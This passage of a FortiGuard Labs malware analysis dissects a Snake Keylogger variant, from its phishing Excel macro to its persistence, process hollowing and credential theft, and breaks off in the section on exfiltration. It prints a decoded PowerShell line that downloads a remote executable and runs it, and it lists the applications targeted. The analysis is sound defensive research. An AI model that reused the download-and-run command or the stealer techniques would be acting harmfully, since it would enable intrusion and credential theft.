{"id":17983,"date":"2022-02-02T10:17:26","date_gmt":"2022-02-02T18:17:26","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11716\/"},"modified":"2022-02-02T10:17:26","modified_gmt":"2022-02-02T18:17:26","slug":"news-11716","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11716\/","title":{"rendered":"Deep Dive into a Fresh Variant of Snake Keylogger Malware"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs.html?utm_source=blog&amp;utm_medium=campaign&amp;utm_campaign=FortiGuardLabs\">FortiGuard Labs<\/a>\u00a0Threat\u00a0Research Report<\/b><\/p>\n<p><b>Affected platforms:<\/b>\u00a0\u00a0\u00a0\u00a0Microsoft Windows<br \/> <b>Impacted parties:<\/b>\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0Windows Users<br \/> <b>Impact:<\/b>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Collects sensitive information from victims\u2019 device<br \/> <b>Severity level<\/b><span>: \u00a0 \u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Critical<\/span><\/p>\n<p><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguardlabs\">Fortinet\u2019s FortiGuard Labs<\/a> recently captured a Microsoft Excel sample from the wild that was used to spread <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/malware?utm_source=blog&amp;utm_campaign=malware\">malware<\/a>. After researching its behaviors, I recognized it as a fresh variant of the Snake <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/what-is-keyloggers.html%20?utm_source=blog&amp;utm_campaign=keylogger\">Keylogger<\/a> malware.<\/p>\n<p>Snake Keylogger is a malware developed using .NET. It first appeared in late 2020 and focused on stealing sensitive information from a victim\u2019s device, including saved credentials, the victim\u2019s keystrokes, screenshots of the victim\u2019s screen, and clipboard data.\u00a0<\/p>\n<p>In July, 2021, Snake Keylogger first entered into a TOP 10 popular malware families\u00a0report, meaning that the Snake Keylogger family is increasing its influence and impacting more people\u2019s devices and sensitive data.<\/p>\n<p>In this threat research blog you will learn how the Snake Keylogger variant is downloaded and executed through a captured Excel sample, what techniques this variant uses to protect it from being analyzed, what sensitive information it steals from a victim\u2019s machine, and how it submits that collected data to the attacker.\u00a0<\/p>\n<p>Here we go.<\/p>\n<h2>What the\u00a0Captured Microsoft Excel Sample Looks\u00a0Like<\/h2>\n<p>This Excel sample, delivered as an attachment in a phishing email, contains malicious Macro VBA code. Figure 1.1 shows a screenshot of when it is opened. It displays a vague picture of a document and asks the victim to click the yellow button to get a clearer image.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image.img.png\/1635971358250\/picture1.png\" alt=\"Figure 1.1 \u2013 The Excel file content when it is opened\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1.1 \u2013 The Excel file content when it is opened<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Once the yellow button \u201cEnable Content\u201d is clicked by victim, the malicious VBA code is executed in the background. The malicious macro project that contains the malicious VBA code is password protected so it cannot be viewed by the analyzer. However, we were able to modify its binary file to remove this restriction.<\/p>\n<p>Going through its code, a \u201cWorkbook_Activate()\u201d method is automatically called when the document is opened. It writes a piece of <a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/offense-and-defense-a-tale-of-two-sides-powershell?utm_source=blog&amp;utm_campaign=offense-and-defense-a-tale-of-two-sides-powershell\">PowerShell<\/a> code from a local variable into a BAT file. Figure 1.2 shows partial VBA code of this method, where variable \u201cs\u201d holds the PowerShell code and &quot;Gqyztfbtsogpnruooqr.bat&quot; is the BAT file, which is finally executed by calling code \u201cx = Shell(bat, 0)\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_205518390.img.png\/1635971390509\/picture2.png\" alt=\"Figure 1.2 \u2013 Macro VBA code executed in background\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1.2 \u2013 Macro VBA code executed in background<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The bottom of Figure 1.2 shows the content of variable \u201cs\u201d, which contains the base64-encoded PowerShell code that is decoded by PowerShell.exe when it is executed.\u00a0<\/p>\n<p>Below is the base64-decoded PowerShell code:<\/p>\n<p style=\"margin-left: 40.0px;\">$ProcName = &quot;Wheahmnfpgaqse.exe&quot;;<br \/> (New-Object System.Net.WebClient).<b>DownloadFile<\/b><span>(&quot;hxxp[:]\/\/3[.]64[.]251[.]139\/v3\/2\/Requests07520000652.exe&quot;,&quot;$env:APPDATA$ProcName&quot;);<br \/>  <\/span><b>Start-Process<\/b><span>\u00a0(&quot;$env:APPDATA$ProcName&quot;)<\/span><\/p>\n<p>The PowerShell code is very simple and easy to understand. It downloads a file (\u201cRequests07520000652.exe\u201d) onto a victim\u2019s device, places it at \u201c%AppData%Wheahmnfpgaqse.exe&quot; by calling \u201cDownloadFile()\u201d, and executes it by calling \u201cStart-Process()\u201d.<\/p>\n<h2>Snake Keylogger Downloader<\/h2>\n<p>After some research, I learned that the file\u00a0&quot;Wheahmnfpgaqse.exe&quot;\u00a0is a downloader of Snake Keylogger, which is a .Net program. When it starts, it sleeps 21 seconds to bypass those sandboxes with a strategy of killing a sample process when a timeout of no-action is triggered.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_2090882926.img.png\/1635971495247\/picture3.png\" alt=\"Figure 2.1 \u2013 Downloads &amp; decrypts Snake Keylogger module after a sleep\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2.1 \u2013 Downloads &amp; decrypts Snake Keylogger module after a sleep<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Twenty one seconds later, the downloader then invokes a function called \u201cConsturctor()\u201d, as you can see in Figure 2.1. It then invokes another function \u201cProgram.List_Types()\u201d, where it downloads Snake Keylogger module from the link \u201chxxps[:]\/\/store2[.]gofile[.]io\/download\/0283e6ba-afc6-4dcb-b2f4-3173d666e2c4\/Huzeigtmvaplpinhoo.dll\u201d, which is a RC4 encrypted DLL file. Next, it calls \u201cToRc()\u201d function to RC4 decrypt it using a decryption key &quot;Dllzjn&quot;.<\/p>\n<p>It then proceeds to load the decrypted Dll module (a .Net Dll file, called \u201cHuzeigtmvaplpinhoo.dll\u201d), and enumerates its export functions to find &quot;G6doICqoMU()&quot;, which is invoked by executing \u201ctype.InvokeMember(&quot;G6doICqoMU&quot;, BindingFlags.InvokeMethod, null, null, null)\u201d in function Consturctor(), as shown in Figure 2.1. The decrypted .Net Dll is a dropper and installer of Snake Keylogger.\u00a0<\/p>\n<p>Let\u2019s dive into this module to see how it performs its tasks.<\/p>\n<h2>Snake Keylogger Installer<\/h2>\n<p>According to my analysis, the decrypted Dll module (\u201cHuzeigtmvaplpinhoo.dll\u201d) deploys Snake Keylogger onto a victim\u2019s device and sets it as an auto-run program. It extracts an executable PE file into memory from the Resource directory and then performs process hollowing that injects the executable PE file into a newly created child process and executes it.\u00a0<\/p>\n<p>I will explain in detail how it performs these functions in this section.<\/p>\n<p style=\"margin-left: 40.0px;\"><b style=\"\">1. Persistence Mechanism\u00a0<\/b><\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_792355966.img.png\/1635971618952\/picture4.png\" alt=\"Figure 3.1 \u2013 Breaks on the export function \u201cG6doICqoMU()\u201d in the debugger dnSpy\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.1 \u2013 Breaks on the export function \u201cG6doICqoMU()\u201d in the debugger dnSpy<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 3.1 shows an outline of the decrypted Dll module (\u201cHuzeigtmvaplpinhoo.dll\u201d). As you can see, to prevent its code from being analyzed the file is obfuscated so that the class names, function names, and variable names are all randomly generated meaningless strings. This creates trouble for analysts when analyzing it.\u00a0<\/p>\n<p>The full name of the export function \u201cG6doICqoMU()\u201d is \u201cHuzeigtmvaplpinhoo!pXfqpio3clcAoFxTnfJ.CORFgLoyRGlurYwdwIh.G6doICqoMU()\u201d. Again, for the same reason as before, it sleeps 35 seconds at the beginning of this function to bypass some malware analysis systems.<\/p>\n<p>Next, it works to make this Snake Keylogger persistent on the infected Windows. As we all know, a Windows system has a \u201cStartup\u201d folder inside the \u201cStart Menu\u201d. The programs inside this folder are started when Windows starts. The full path to this folder is defined in the system registry with a string value of \u201cHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup\u201d and \u201cHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup\u201d. The value data of \u201cStartup\u201d is C:Users{UserName}AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup\u201d by default.\u00a0<\/p>\n<p>This variant of Snake Keylogger changes both the values of \u201cStartup\u201d to other folders. Figure 3.2 shows the code changing the Windows startup folder to \u201cC:UsersM0YTes0EnvAppDataRoamingMicrosoftWindowsStart\u00a0MenuProgramschsg\u201d by calling the API SetValue(). In the bottom half of Figure 3.2 you can see the content of the system registry path, value name, and new value data.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_2067856085.img.png\/1635971652447\/picture5.png\" alt=\"Figure 3.2 \u2013 Change Windows \u201cStartup\u201d folder to a new path\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.2 \u2013 Change Windows \u201cStartup\u201d folder to a new path<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>\u201cchsg\u201d is a new folder created by Snake Keylogger. The program copies the Snake Keylogger file (the downloaded\u00a0&quot;Wheahmnfpgaqse.exe&quot;) into this folder and renames it as \u201csgosr.exe\u201d. This ensures that Snake Keylogger will be started by the Windows system every time it starts.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>2. Extraction from Resource\u00a0<\/b><\/p>\n<p>Although the content of\u00a0Huzeigtmvaplpinhoo.dll only appears in memory, to analyze it I saved it into a local file. It has several resources in the Resource directory, as shown below in Figure 3.3.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_971564952.img.png\/1635971716946\/picture6.png\" alt=\"Figure 3.3 \u2013 Resource directory display of Huzeigtmvaplpinhoo.dll\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.3 \u2013 Resource directory display of Huzeigtmvaplpinhoo.dll<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The process of extracting the payload file of Snake Keylogger is a little complicated. It uses a tricky way to load the resource. It has a local callback function defined by ResolveEventHandler that is registered to AppDomain.ResourceResolve, which is then called when it fails to load a resource by name. It looks like an exception handler to Windows SEH strategy to handle exceptions. In addition, it has another local callback function registered to AppDomain.AssemblyResolve, which is called when it fails to load an assembly (like a module) by name.<\/p>\n<p>Below is a pseudocode of registering a local resource resolve, where T9wOjU5ccxTJaVfUntn.Osc50oil0l is the local callback function.<\/p>\n<p style=\"margin-left: 40.0px;\"><i>AppDomain.ResourceResolve\u00a0+=\u00a0new\u00a0ResolveEventHandler(T9wOjU5ccxTJaVfUntn.Osc50oil0l)<\/i><\/p>\n<p>Now, let\u2019s see how Snake Keylogger solves this challenge\u2014loading a nonexistent resource, which will trigger the resource loading failure. It plans to read a Resource named &quot;Qkxkikeg&quot; from the current module, which has no such named resource in the Resource directory, as you can see in Figure 3.3. A resource loading failure occurs and the registered local ResolveEventHandler function is called to solve this error. This then causes a loading assembly failure and its assembly resolve callback function is called.<\/p>\n<p>A while later, another PE file, decrypted from resource \u201c{d977ee8c-85ce-4731-b9a1-323ba88c6eeb}\u200e\u201d, appears in memory. It contains a resource with the name \u201cQkxkikeg\u201d, which is the original request resource name, as shown in Figure 3.4.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1085725967.img.png\/1635971801659\/picture7.png\" alt=\"Figure 3.4 \u2013 \u201cQkxkikeg\u201d resource is in another module\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.4 \u2013 \u201cQkxkikeg\u201d resource is in another module<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The payload of Snake Keylogger is just a compressed in GZIP format in the resource \u201cQkxkikeg\u201d under the Resource directory \u201cClassLibrary1.Properties.Resources\u201d.<\/p>\n<p>Figure 3.5 displays the GZIP data of the resource \u201cQkxkikeg\u201d (reversed) on the left and the decompressed Snake Keylogger on the right side.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_463161130.img.png\/1635971830008\/picture8.png\" alt=\"Figure 3.5 \u2013 Compressed and decompressed data of \u201cQkxkikeg\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.5 \u2013 Compressed and decompressed data of \u201cQkxkikeg\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p style=\"margin-left: 40.0px;\"><b>3. Process Hollowing<\/b><\/p>\n<p>The program then creates a suspended child process and deploys the compressed Snake Keylogger payload into the child process. It then resumes the child process to run. Meanwhile, the parent process exits by calling the function Environment.Exit(0).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1455412994.img.png\/1635971860106\/picture9.png\" alt=\"Figure 3.6 \u2013 Create a suspended child process\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.6 \u2013 Create a suspended child process<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>According to the code in Figure 3.6, it is about to call API CreateProcess() to create the child process with Creation Flag 134217732U (0x8000004), which means\u00a0CREATE_NO_WINDOW and CREATE_SUSPENDED.<\/p>\n<p>It then calls the API WriteProcessMemory() to copy the Snake Keylogger payload into the child process, section by section. It next calls SetThreadContext() to make the child process point to the entry point function of Snake Keylogger. Before the parent process exits, an API ResumeThread() is called to have the child process restored to run.<\/p>\n<h2>Snake Keylogger Payload<\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_638198016.img.png\/1635971901819\/picture10.png\" alt=\"Figure 4.1 \u2013 Fully obfuscated Snake Keylogger payload\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.1 \u2013 Fully obfuscated Snake Keylogger payload<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The code of the Snake Keylogger payload file is fully obfuscated, as shown in Figure 4.1, to protect it from being analyzed. The class and function names are unreadable.<\/p>\n<p>Therefore, to better analyze and explain its code and intention, I deobfuscated the payload file using the tool \u201cde4dot\u201d. This made its code more readable, and my analysis is based on that result.<\/p>\n<p>Going through the Snake Keylogger code, I realized that it provides features like recording a victim\u2019s keystrokes (the keylogger), stealing data from the clipboard, obtaining a victim\u2019s screenshot, stealing the data on the system clipboard, as well as stealing saved credentials for some specified software clients installed on a victim\u2019s device.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>1. Keylogger Feature<\/b><\/p>\n<p>Figure 4.2 shows a code snippet of setting up the keylogger.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1969115062.img.png\/1635971977004\/picture11.png\" alt=\"Figure 4.2 \u2013 Initialization of Keylogger\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.2 \u2013 Initialization of Keylogger<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It calls API SetWindowsHookExA() to register a hook callback function( this.callback_ProcessKey()) to monitor low-level keyboard input events. The first parameter is the hook type, where \u201c13\u201d indicates WH_KEYBOARD_LL.<\/p>\n<p>After that, the callback function is called by the Windows system when the victim types, so it is able to handle and record the keystrokes into a global string variable. It also records the foreground Window title to identify where the victim types by calling the <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/api-security?utm_source=blog&amp;utm_campaign=api-security\">APIs<\/a> GetForegroundWindow() and GetWindowText ().<\/p>\n<p>It also has a Timer (Timer0) that keeps sending the keylogger data to the attacker.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>2.\u00a0Screenshot<\/b><\/p>\n<p>It is able to take screenshots of the victim\u2019s device. It has a Timer (Timer1), which captures the victim\u2019s screenshots from time to time by calling API CopyFromScreen(). It saves the screenshot into a local Screenshot.png file in the system\u2019s \u201cMyDocuments\u201d folder. It also sends this picture file to the attacker.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>3.\u00a0System Clipboard\u00a0<\/b><\/p>\n<p>It has two Timers. One (Time2) is used to collect system clipboard data by calling Clipboard.GetText() and save to a global variable. The other (Time3) is used to send collected clipboard data to the attacker.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1063306164.img.png\/1635972073656\/picture12.png\" alt=\"Figure 4.3 \u2013 Timer function to obtain system clipboard data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.3 \u2013 Timer function to obtain system clipboard data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 4.3 shows the Timer function used to obtain system clipboard data. Every time it counts down it checks to see whether current clipboard data has been collected in the global variable main_cls.string_clipboard_data. If not, it appends the current clipboard data to the global variable.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>4. Steal Credentials<\/b><\/p>\n<p>Based on my analysis, this variant\u2019s main work is to steal credentials from the victim\u2019s device. It implements stealing credentials in the Main() function, as shown in Figure 4.4, below.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_144204442.img.png\/1635972136497\/picture13.png\" alt=\"Figure 4.4 \u2013 Main() with functions to steal credentials and submit them\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.4 \u2013 Main() with functions to steal credentials and submit them<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This is the deobfuscated Main() function showing the functions used to steal credentials from various clients. The function at the bottom submits the stolen credentials. These functions obtain the saved credentials for each software from the different places they are save their credentials, including local files (like Chrome) and system registry (like Outlook), etc.<\/p>\n<p>I will now use Outlook as an example to explain how Snake Keylogger collects credentials.<\/p>\n<p>Figure 4.5 is a screenshot of a function that is about to read the credentials of Microsoft Outlook from the system registry. It goes through four registry paths for different Outlook versions to read out (if applicable) \u201cEmail\u201d and &quot;IMAP Password&quot; or &quot;POP3 Password&quot; or &quot;HTTP Password&quot; or &quot;SMTP Password&quot; and \u201cSMTP Server\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_426622320.img.png\/1635972175229\/picture14.png\" alt=\"Figure 4.5 \u2013 Function to collect saved credentials for Microsoft Outlook\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.5 \u2013 Function to collect saved credentials for Microsoft Outlook<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Below is an example showing what credentials information Snake Keylogger can collect from Microsoft Outlook:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&#8212;&#8212;&#8211; Snake Keylogger &#8212;&#8212;&#8211;<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">Found From: Outlook<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">URL: smtp.gmail.com<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">E-Mail: victim_email@gmail.com<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">PSWD: {Password}<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/span><\/strong><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>I have categorized those clients that Snake Keylogger focuses on as below:<\/p>\n<p><b>Web Browsers:<\/b><\/p>\n<p>Google Chrome, Mozilla Firefox, Mozilla SeaMonkey Browser, Mozilla IceCat Browser, Yandex Browser, Microsoft Edge, Amigo Browser, Nichrome Browser, QQBrowser, Coccoc Browser, Orbitum Browser, Slimjet Browser, Iridium Browser, Vivaldi Browser, Iron Browser, Ghost Browser, Cent Browser, Xvast Browser, Chedot Browser, SuperBird Browser, 360 Browser, 360 Secure Browser, Comodo Dragon Browser, Brave-Browser, Torch Browser, UC Browser, Blisk Browser, Epic Privacy Browser, Opera Web Browser, Liebao Browser, Avast Browser, Kinza Browser, BlackHawk Browser, Citrio Browser, Uran Browser, Coowon Browser, 7 Star Browser, QIP Surf Browser, Sleipnir Browser, Chrome Canary Browser, CoolNovo Browser, SalamWeb Browser, Sputnik Browser Extension, Falkon Browser, Elements Browser, Slim Browser, Ice Dragon Browser, CyberFox Browser, PaleMoon Browser, Waterfox Browser, Kometa Browser and various browsers designed based on Chromium project.<\/p>\n<p><b style=\"\">Email Clients:<\/b> <\/p>\n<p>Microsoft OutLook, Tencent Foxmail, Mozilla Thunderbird and Postbox.<\/p>\n<p><b>Other Clients:<\/b><\/p>\n<p>FileZilla, Pidgin and Discord.<\/p>\n<h2>Sending the Stolen Data to the Attacker<\/h2>\n<p>Per the code of this variant of Snake Keylogger, it sends an email to the attacker (using SMTP protocol) to submit the stolen credentials data of the victim.\u00a0<\/p>\n<p>Snake Keylogger collects basic information regarding the victim\u2019s Windows system, like User name, PC name, System Date and Time, Public IP address, and Country, which are put in the header of the collected credentials.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1738762118.img.png\/1635972321957\/picture15.png\" alt=\"Figure 5.1 \u2013 Craft email with stolen credentials\"\/>         <\/noscript>          <span 